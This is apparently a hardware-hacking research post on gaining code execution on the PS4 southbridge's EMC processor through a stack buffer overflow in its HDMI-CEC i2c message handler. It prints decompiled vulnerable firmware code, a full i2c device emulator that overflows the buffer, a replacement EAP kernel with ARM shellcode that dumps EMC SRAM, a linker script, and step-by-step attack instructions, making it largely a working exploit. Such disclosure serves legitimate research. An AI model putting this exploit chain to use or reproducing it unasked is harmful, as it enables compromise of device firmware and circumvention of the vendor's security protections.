PS4 Aux Hax 4: Belize via CEC

This post describes another way to attain code execution on Aeolia (actually, the southbridge revision on PS4 Pro which was used in this case is named “Belize”).
This exploit differs from the previously documented method as it does not have the prerequisite of gaining control of the APU. Additionally it is fairly generic and therefor workable on all currently released hardware and software versions of PS4.

From Aeolia to Belize

Previously, we have attained permanent code exec on the southbridge on the SAA-001 motherboard. This chip is marked as CXD90025G (referred to as Aeolia internally) and constitutes the first production version. As mentioned in previous posts in this series, there have been many revisions of the PS4, and it makes sense to assume more recent hardware includes more advanced security features. With the original Aeolia owned, it was possible to examine the EMC and EAP firmware and look for vulnerabilities which would allow a more direct attack on the successive hardware revisions. Specifically, the target was the southbridge on the most recent (at the time) PS4 Pro NVB-003 motherboard: marked CXD90046GG and named Belize. From reversing the Belize driver in the x86 FreeBSD kernel, it could be seen that the device was functionally mostly identical to Aeolia. For our purposes, “Aeolia” and “Belize” are interchangeable, so keep that in mind while reading this post.

Sidenote: NVB-003 contains a cost-reduced version of syscon, marked as A05-C0L2. This chip can be pwned exactly the same as the original version, so there will be no further post about that.

Common attack vectors

To bridge the gap between Aeolia and Belize, it is helpful to understand the execution flow on Aeolia, up to the point the “Rest Mode” kernel runs: While the EMC IPL and EAP KBL are both encrypted with keysets unique to each southbridge hardware revision and stored in sflash, the EAP FreeBSD kernel is stored on the hard drive and there exists only one version - meaning the key is shared between all hardware revisions. Since we can decrypt the entire boot chain used by the original Aeolia, we can recover the static keys used to encrypt and (HMAC) sign the FreeBSD kernel. By doing so and replacing the EAP kernel partition of the HDD, we easily gain EAP kernel code exec on any Aeolia or Belize southbridge revision.

While this is already quite nice, the goal is to get code exec on EMC. The EAP runs entirely from external DDR3 memory, while EMC executes only from internal SRAM. However, experimentation with Aeolia showed that EMC is actually capable of executing instructions out of the DDR3 as well. This massively simplifies generic exploitation of EMC since the address range of DDR3 is well known, and given EAP code exec, the content can be arbitrarily controlled. All that’s needed is a way to make EMC start executing instructions from DDR3 - the rest is simple.

To fulfill the wish of owning EMC without needing the APU to be compromised, other interactions between EMC firmware and external interfaces were checked for bugs. Surprisingly, a bug straight out of the 90s fell out during this investigation: a stack buffer overflow, with return address in range, and fully controlled contents. Even more amusingly, the bug is in the HDMI-CEC code, which makes this the first “real” CEC exploit I’m aware of, despite the numerous publications which exist for some years already… (OK, technically the bug concerns CEC-over-i2c, but still!).

The bug

The vulnerability, as seen in the Aeolia firmware, is as follows:

int I2cRead(void *iface, unsigned int addr, u8 reg, void *dst, int len);

int getRecvMsg(cec_task_t *a1, void *a2) {
  return I2cRead(a1->i2c_iface, 0x7Au, 0x62u, a2, 1);
}

int cec_recv_msg(cec_task_t *a1, u8 *msg, unsigned int len) {
  unsigned int i; // r4
  int v7; // r0
  unsigned int j; // r4
  int dst; // [sp+4h] [bp-24h]

  v7 = 0;
  for (i = 0; i < len; i = (u8)(i + 1)) {
    v7 = I2cRead(a1->i2c_iface, 0x7Au, 0x61u, &dst, 1);
    if (v7) {
      print_nop("Cec Recv Err:%8lx\n", v7);
      return v7;
    }
    msg[i] = dst;
  }
  if (g_cec_log == 1) {
    ucmd_printf("[CEC] R:");
    for (j = 0; j < len; j = (u8)(j + 1)) {
      ucmd_printf("%2x", msg[j]);
    }
    ucmd_printf("\n");
  }
  return v7;
}

int doRecvInterruptEvent(cec_task_t *a1, int state) {
  int v4; // r0
  int v5; // r1
  const char *v6; // r0
  int mode; // r5
  int result; // r0
  int v9; // r0
  u8 msg[20]; // [sp+4h] [bp-34h]
  u8 len; // [sp+18h] [bp-20h]
  u8 total_msg_len; // [sp+1Ch] [bp-1Ch]

  bzero(msg, 0x14u);
  len = 0;
  total_msg_len = 0;
  v4 = cec_read_errcode(a1);
  v5 = v4;
  if (v4 && v4 != 15) {
    v6 = "_doRecvInterruptEvent,  err:%2x\n";
  } else {
    switch (state) {
      case 1:
        mode = 2;
        break;
      case 2:
      case 3:
        mode = 1;
        break;
      case 4:
      case 5:
        mode = 0;
        break;
      default:
        return -1;
    }
    v5 = getRecvMsg(a1, &total_msg_len);
    if (v5 || !total_msg_len) {
      v6 = "_getRecvMsg, Total Msg Len 0 or Err: 0x%8lx\n";
    } else {
      while (1) {
        print_nop("_getRecvMsg, Total Msg Len : 0x%2x\n", total_msg_len);
        v5 = I2cRead(a1->i2c_iface, 0x7Au, 0x63u, &len, 1);
        if (v5)
          goto LABEL_14;
        if (total_msg_len < (unsigned int)len)
          break;
        print_nop("_getRecvMsg, Msg Len : 0x%2x\n", len);
        //
        // XXX oops! length is up to 0xff here (both `total_msg_len` and `len`
        // are controlled). This will write off the end of `u8 msg[0x14]` with
        // data read directly from i2c.
        //
        v5 = cec_recv_msg(a1, msg, len);
        if (v5)
          goto LABEL_14;
        if (len && len <= 0x11u) {
          v9 = CecAn_analyzeMessage(a1->field_14, mode, msg, len);
          if (v9 == 1) {
            sendCecMsgReceiveEventNotify(a1, msg, len);
          } else if (v9 == 5) {
            cec_event_flg_set(a1, 1024);
          }
        } else {
          print_nop("CecCommEvent_InterruptReceiveMsg, len:0x%2x\n", len);
        }
        result = getRecvMsg(a1, &total_msg_len);
        if (result) {
          v5 = result;
LABEL_14:
          v6 = "_getRecvMsg, Reg Err : 0x%8lx\n";
          goto LABEL_18;
        }
        if (!total_msg_len)
          return result;
      }
      v5 = len;
      v6 = "_getRecvMsg, Err, msg_len : 0x%2x\n";
    }
  }
LABEL_18:
  print_nop(v6, v5);
  return -1;
}
while this seems nice and easy, reaching the code is a bit tricky:

  1. HDMI must be active, with CEC enabled.
  2. The code runs only in response to some interrupt being generated from the HDMI encoder.
  3. Boards with Belize have a different model of HDMI encoder than the original Aeolia. This could result in the bug being fixed accidentally, the code looking completely different, or even removed altogether.

Reaching the bug

The first condition required for the code path to be reachable is that HDMI-CEC is enabled and active. While it is possible to force this condition using icc commands from EAP to EMC, it is much simpler (in that it doesn’t require writing any code) to just boot the APU and ensure [Enable HDMI Device Link] is enabled in the settings. The APU needs to be cycled in any case in order to start Rest Mode - which will execute our custom EAP kernel.

Dealing with i2c

The second and third issues were resolved in the process of creating a way to talk with the CEC interface of Belize.

The original idea was to man-in-the-middle the i2c by corrupting the address bits as they were shifted out of Belize (which would cause the HDMI encoder to not recognize it was the targeted device), and then handle the data transfer with my own device. However this wound up not working. As it turns out, the i2c interface of EMC is built to detect such contention and will immediately stop driving the bus. This wasn’t completely unexpected - to workaround it, I just found the power switch used by syscon to control the HDMI encoder and forcably disable it when I’d like to take over the bus. This is not as clean - it requires rebooting the HDMI encoder and Belize to recover sanity - but hey, it works.

As mentioned, the vulnerable code is run in response to a certain interrupt event. By probing i2c and pulling down various nearby pins of the HDMI encoder, it was easy to determine that there is a dedicated trace for the general interrupt event. When responding to this event, the EMC firmware will read some registers of the HDMI encoder in order to discover the pending interrupts. Eventually, the buggy code will be invoked if the proper interrupt is pending (it’s named HDMI_INTRID_CECRX).

By comparing logic analyzer traces of the HDMI encoder used by original Aeolia (Panasonic MN86471A) to that used by Belize (Panasonic MN864729), it could be seen that the register layout had changed slightly, but it was a simple matter to determine the registers and values required to mount the attack in the Belize/MN864729 environment. A quick test to try crashing EMC via too-long CEC buffer worked, so issue #3 was taken care of as well.

Hardware setup

For Belize, the setup looks like:

Exploitation

On the device simulating the HDMI encoder, the following code is run. This is a simple state machine which serves only to redirect EMC’s program counter to 0x61616161. This address was chosen just in case there is some unknown misalignment going on - no matter which offset the return address is read from, it will always point to 0x61616161 (which is in EMC’s view of DDR3).

struct DevEmu {
    void StartCondition();
    u8 Read(u8 addr);
    void Write(u8 addr, u8 val);
    u8 dev10_regf2{};
    u8 irq_status{};
    u8 irq_mask{};
    u8 msg_buf[0xfe]{};
    u8 msg_pos{};
    u8 msg_len{};
    u8 reg{};
    size_t pos{};
    std::function<void(bool)> set_irq;
};

void DevEmu::StartCondition() {
    pos = 0;
}

// Note: this only simulates MN864729
u8 DevEmu::Read(u8 addr) {
    size_t pos_ = pos++;
    switch (addr) {
    case 0x10:
        // irq stuff
        switch (reg) {
        case 0xf2: return dev10_regf2;
        case 0xf4: return 0xa0;
        // hdmi irq 18 is 0x10
        case 0xf7: return irq_status;
        case 0xfa: return 0x0f;
        case 0xfc: return 0x50;
        case 0xff: return irq_mask;
        }
    case 0x80:
        // cec buffers
        switch (reg) {
        // rx fifo
        case 0x61: {
            u8 val = msg_buf[msg_pos];
            if (pos_ == 0 && msg_pos < sizeof(msg_buf)) {
                // ignore over-read generated by fpga
                msg_pos++;
            }
            return val;
        }
        // total msg len
        case 0x62: return msg_len - msg_pos;
        // msg len
        case 0x63: return msg_len - msg_pos;
        // error code
        case 0x69: return 0;
        }
    }
    return 0;
}

void DevEmu::Write(u8 addr, u8 val) {
    size_t pos_ = pos++;
    if (pos_ == 0) {
        reg = val;
        return;
    }
    switch (addr) {
    case 0x10:
        switch (reg) {
        case 0xf2:
            dev10_regf2 &= ~val;
            break;
        case 0xf7:
            irq_status &= ~val;
            set_irq(irq_status & 0x10);
            break;
        }
    }
}

void CecHax::Enable(bool enable) {
    if (enable) {
        // Disable power to real HDMI encoder
        gpio.Set(Gpio::kLow);
        // Enable our hardware
        csrs.Write(i2c_enable, 1);
        // Trigger IRQ to EMC
        csrs.Write(irq_n, 0);
    } else {
        csrs.Write(irq_n, 1);
        csrs.Write(i2c_enable, 0);
        //gpio.Set(Gpio::kHigh);
    }
}

bool CecHax::HasError() {
    CSRValue err;
    csrs.Read(i2c_error, &err);
    return err != 0;
}

void CecHax::Run() {
    dev_emu.set_irq = [this](bool enable) {
        csrs.Write(irq_n, enable ? 0 : 1);
    };
    dev_emu.dev10_regf2 = 0x62;
    dev_emu.irq_status = 0b00010000;
    dev_emu.irq_mask   = 0b11010000;
    dev_emu.msg_len = 0x60;

    auto p = (u32 *)dev_emu.msg_buf;
    for (size_t i = 0; i < dev_emu.msg_len / sizeof(u32); i++) {
        *p++ = 0x61616160|1;
    }

    Enable(true);
    while (!HasError()) {
        CSRValue val;
        csrs.Read(i2c_event, &val);
        if (val & kStart) {
            dev_emu.StartCondition();
            csrs.Write(i2c_event_clr, 1);
        }
        if (val & kHolding) {
            CSRValue addr;
            csrs.Read(i2c_cur_addr, &addr);
            bool is_read = addr & 1;
            addr &= ~1;
            if (is_read) {
                // read - send byte
                val = dev_emu.Read(addr);
                csrs.Write(i2c_dout, val);
            } else {
                // write - recv byte
                csrs.Read(i2c_din, &val);
                dev_emu.Write(addr, val);
            }
            csrs.Write(i2c_event_clr, 1);
            printf("%02x:%c.%x %02x\n", addr, is_read ? 'r' : 'w',
                dev_emu.pos, val);
        }
    }
    Enable(false);
}

The following code replaces the entire EAP kernel. The emc_shellcode section will be loaded to the desired address (which EMC will return to) in DDR3 by the ELF loader in EAP KBL. All the EAP code does is wait for EMC to execute the dumper shellcode, then repeatedly spews the result out of UART.

/*
arm-none-eabi-gcc -std=gnu11 -nostdlib -T eap_kernel.ld -o eap_kernel eap_kernel.c
arm-none-eabi-strip --strip-unneeded eap_kernel
*/
typedef unsigned char u8;
typedef unsigned int u32;
typedef volatile u32 vu32;
typedef u32 size_t;

// used by emc ucmd
#define EAP_UART0_BASE 0xBF240000
// uart1 is port x86 soc uses too
#define EAP_UART1_BASE 0xBF340000
#define EAP_DDR3_BASE 0xc0000000
#define EAP_SHARED_BUF (EAP_DDR3_BASE + 0x01000000)
#define EMC_DUMP_START 0x100000
#define EMC_DUMP_END 0x160000
#define EMC_DUMP_LEN (EMC_DUMP_END - EMC_DUMP_START)

static void uart_write_byte(u8 val) {
    vu32 *dat    = (vu32 *)(EAP_UART1_BASE + 0x00);
    vu32 *status = (vu32 *)(EAP_UART1_BASE + 0x14);
    while (!(*status & 0x40));
    *dat = val;
}

static void uart_write_str(const char *str) {
    while (*str) {
        uart_write_byte(*str++);
    }
}

static void hexdump(const void *buf, size_t len) {
    const u8 *p = buf;
    const char *lut = "0123456789abcdef";
    for (size_t i = 0; i < len; i++) {
        if (i > 0 && (i & 0xf) == 0) {
            uart_write_byte('\n');
        }
        u8 val = p[i];
        uart_write_byte(lut[val >> 4]);
        uart_write_byte(lut[val & 0xf]);
    }
}

// EMC code
// EAP 0xc0000000 = 0x60000000 in EMC space
// Will be placed by elf loader (eap_kbl)
static const u8 dumper[] __attribute__((section("emc_shellcode"))) = {
    0x5F, 0xF4, 0x80, 0x10, 0x40, 0xF2, 0x00, 0x01,
    0xC6, 0xF2, 0x00, 0x11, 0x40, 0xF2, 0x00, 0x02,
    0xC0, 0xF2, 0x16, 0x02, 0x03, 0x68, 0x0B, 0x60,
    0x04, 0x30, 0x04, 0x31, 0x90, 0x42, 0xF9, 0xD1,
    0x40, 0xF2, 0x00, 0x00, 0xC6, 0xF2, 0x00, 0x10,
    0x4C, 0xF2, 0xDE, 0x01, 0xC1, 0xF2, 0x37, 0x31,
    0x40, 0xF8, 0x04, 0x1C, 0xFE, 0xE7
};

// SCTLR &= ~(I|C|M)
static void disable_caches_and_mmu() {
    asm volatile(
        "mrc     p15, 0, r6, c1, c0, 0;"
        "bic     r6, r6, #0x1000;"
        "bic     r6, r6, #4;"
        "bic     r6, r6, #1;"
        "mcr     p15, 0, r6, c1, c0, 0;"
        :
        :
        : "r6"
    );
}

// (old) gcc is really dumb, must define arm->thumb target like so
typedef void (*icc_watchdog_stop_wdt_t)();
static const icc_watchdog_stop_wdt_t icc_watchdog_stop_wdt =
    (icc_watchdog_stop_wdt_t)(0xC0010880|1);

void _start() {
    uart_write_str("go\n");
    
    icc_watchdog_stop_wdt();
    disable_caches_and_mmu();

    vu32 *shared_buf = (vu32 *)EAP_SHARED_BUF;
    vu32 *magic = &shared_buf[-1];
    *magic = 0;
    uart_write_str("EAP running\n");
    while (*magic == 0);
    for (size_t i = 0; i < 10000; i++) {
        uart_write_str("\ndump:\n");
        hexdump((void *)EAP_SHARED_BUF, EMC_DUMP_LEN);
    }
    while (1);
}

And the related linker script:

ENTRY(_start)
SECTIONS {
    eap 0xc0100000 : {
        *(.text*)
        *(.rodata*)
    }
    emc 0x61616160 + 0x60000000 : {
        *(emc_shellcode)
    }
    /DISCARD/ : { *(*) }
}

So, the overall process is like:

  1. Tap onto CEC-related i2c and irq lines and HDMI encoder power switch
  2. Power up PS4 and enter Rest Mode
  3. Wait for “EAP running” message from custom EAP kernel
  4. Induce the CEC RX interrupt
  5. Feed data to EMC such that it causes a stack buffer overflow
  6. Wait for EMC to copy SRAM to DDR3
  7. Dump copied SRAM out of UART

Of course, this is really EMC code exec, so the dumping is just something to do after the fact :)

Parting thoughts

This post outlines a way to dump EMC firmware and gain EMC code exec on any hardware revision. While the real root keys (in fuses and ROM) of EMC versions besides the first are still unknown, they could yet be recovered with side channel attacks, if someone really wanted them. Since this method is comparatively much more simple and more generic, it stands on its own as an interesting exploit.

As was hinted at, the CXD90046GG version of EMC employs slightly better security practices. The EMC ROM now wipes the SRAM space used as stack during initial key derivation, and some as-of-yet unknown method is used to unmap the ROM, mitigating it being dumped simply by reading from address 0x00000000. Again, it is likely the key material could still be recovered - if someone cares - but it’s interesting to see that such changes made their way into hardware between revisions.